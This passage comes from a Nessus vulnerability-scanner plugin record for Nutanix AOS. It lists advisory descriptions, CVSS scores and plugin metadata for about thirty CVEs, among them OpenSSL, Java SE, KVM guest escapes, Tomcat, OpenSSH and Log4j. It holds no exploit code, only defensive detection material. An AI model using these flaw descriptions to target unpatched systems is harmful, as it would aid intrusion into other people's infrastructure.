1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). 
This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. 
This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 
(CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). 
CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. 
Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. 
The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.\n (CVE-2021-37750)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. 
Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to- right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. 
The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non- default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. 
Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.0.2.5)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-36385", "CVE-2021-20271", "CVE-2021-22543", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-30640", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-37576", "CVE-2021-37750", "CVE-2021-40438", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-12-05T00:00:00", "cpe": 
["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "href": "https://www.tenable.com/plugins/nessus/164564", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164564);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-36385\",\n \"CVE-2021-3653\",\n \"CVE-2021-3656\",\n \"CVE-2021-20271\",\n \"CVE-2021-22543\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-30640\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-37750\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-43527\",\n \"CVE-2021-45046\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.0.2.5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.0.2.5. 
It is, therefore, affected by multiple\nvulnerabilities as referenced in the NXSA-AOS-6.0.2.5 advisory.\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. 
(CVE-2021-20271)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissable length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. 
The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. 
This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. 
